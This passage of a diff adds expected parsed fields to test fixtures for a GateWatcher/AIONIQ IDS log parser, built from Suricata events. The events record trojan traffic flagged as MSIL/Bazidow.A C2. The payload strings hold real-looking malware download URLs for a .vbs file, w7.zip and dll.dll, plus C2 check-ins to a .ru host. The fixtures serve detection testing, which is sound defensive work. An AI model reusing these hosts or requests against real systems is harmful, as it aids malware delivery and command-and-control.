MCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}",
+    "event": {
+      "action": "allowed",
+      "category": [
+        "network"
+      ],
+      "module": "alert",
+      "severity": 1
+    },
+    "@timestamp": "2023-03-22T10:44:08.001000Z",
+    "destination": {
+      "address": "2.2.2.2",
+      "bytes": 90364,
+      "ip": "2.2.2.2",
+      "packets": 66,
+      "port": 16122
+    },
+    "gatewatcher": {
+      "event_type": "alert",
+      "flow_id": "1408237495862400",
+      "gcap": "gcap-xxxxxxx.domain.local",
+      "gcenter": "gcenter-xxxxxxxx.domain.local",
+      "payload": "R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==",
+      "payload_printable": "GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: dc524.4shared.com\r\nConnection: Keep-Alive\r\nCookie: day1host=h\r\n\r\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nCookie: day1host=h\r\nConnection: Keep-Alive\r\nHost: cdnfiles.4shared.com\r\n\r\nGET /a35new/w7.txt HTTP/1.1\r\nHost: 65.181.125.193\r\nConnection: Keep-Alive\r\n\r\nGET /a35new/aw7.tiff HTTP/1.1\r\nHost: 65.181.125.193\r\n\r\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\r\nHost: www.devyatinskiy.ru\r\nConnection: Keep-Alive\r\n\r\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\r\nHost: www.devyatinskiy.ru\r\n\r\n",
+      "timestamp_analyzed": "2023-03-22T10:44:08.001Z",
+      "timestamp_detected": "2023-03-22T10:25:55.690Z",
+      "type": "suricata"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      }
+    },
+    "network": {
+      "protocol": "http",
+      "transport": "TCP"
+    },
+    "observer": {
+      "hostname": "gcap-xxxxxxxx.domain.local",
+      "mac": [
+        "90:e2:ba:a6:a4:90",
+        "90:e2:ba:a6:a4:91"
+      ],
+      "name": "gcap-xxxxxxx.domain.local",
+      "type": "ids",
+      "version": "0.2"
+    },
+    "related": {
+      "hosts": [
+        "gcap-xxxxxxxx.domain.local",
+        "www.devyatinskiy.ru"
+      ],
+      "ip": [
+        "1.1.1.1",
+        "2.2.2.2"
+      ]
+    },
+    "rule": {
+      "category": "A Network Trojan was detected",
+      "id": "2828821",
+      "name": "ETPRO TROJAN MSIL/Bazidow.A HTTP C2"
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "bytes": 3084,
+      "ip": "1.1.1.1",
+      "packets": 19,
+      "port": 8550
+    },
+    "url": {
+      "domain": "www.devyatinskiy.ru",
+      "path": "/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll",
+      "registered_domain": "devyatinskiy.ru",
+      "subdomain": "www",
+      "top_level_domain": "ru"
+    }
   }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json
index baa5139a3..ed0cfe547 100644
--- a/GateWatcher/aioniq/tests/sigflow-file.json
+++ b/GateWatcher/aioniq/tests/sigflow-file.json
@@ -9,6 +9,92 @@
     "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}"
   },
   "expected": {
-    "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}"
+    "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "module": "fileinfo"
+    },
+    "@timestamp": "2023-03-22T10:44:07.998000Z",
+    "destination": {
+      "address": "2.2.2.2",
+      "ip": "2.2.2.2",
+      "port": 8550
+    },
+    "file": {
+      "hash": {
+        "md5": "d526c8e4ad7ab6d80baeb839976b7c80",
+        "sha256": "f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df"
+      },
+      "name": "16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs",
+      "size": 1088
+    },
+    "gatewatcher": {
+      "event_type": "fileinfo",
+      "filemagic": "Little-endian UTF-16 Unicode text, with CRLF line terminators",
+      "flow_id": "1408237495862400",
+      "gcap": "gcap-xxxxxxxxxx.domain.local",
+      "gcenter": "gcenter-xxxxxxxx.domain.local",
+      "timestamp_analyzed": "2023-03-22T10:44:07.998Z",
+      "timestamp_detected": "2023-03-22T10:25:55.469Z",
+      "type": "suricata"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "status_code": 200
+      }
+    },
+    "network": {
+      "protocol": "http",
+      "transport": "TCP"
+    },
+    "observer": {
+      "hostname": "gcap-xxxxxxxxx.domain.local",
+      "name": "gcap-xxxxxxxxxx.domain.local",
+      "type": "ids",
+      "version": "0.2"
+    },
+    "related": {
+      "hash": [
+        "d526c8e4ad7ab6d80baeb839976b7c80",
+        "f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df"
+      ],
+      "hosts": [
+        "cdnfiles.4shared.com",
+        "gcap-xxxxxxxxx.domain.local"
+      ],
+      "ip": [
+        "1.1.1.1",
+        "2.2.2.2"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "port": 16122
+    },
+    "url": {
+      "domain": "cdnfiles.4shared.com",
+      "path": "/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F",
+      "registered_domain": "4shared.com",
+      "subdomain": "cdnfiles",
+      "top_level_domain": "com"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "IE",
+      "original": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+      "os": {
+        "name": "Windows",
+        "version": "7"
+      },
+      "version": "11.0"
+    }
   }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json
index 693d7006a..9a3ca081a 100644
--- a/GateWatcher/aioniq/tests/sigflow-meta.json
+++ b/GateWatcher/aioniq/tests/sigflow-meta.json
@@ -9,6 +9,82 @@
     "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
   },
   "expected": {
-    "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
+    "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 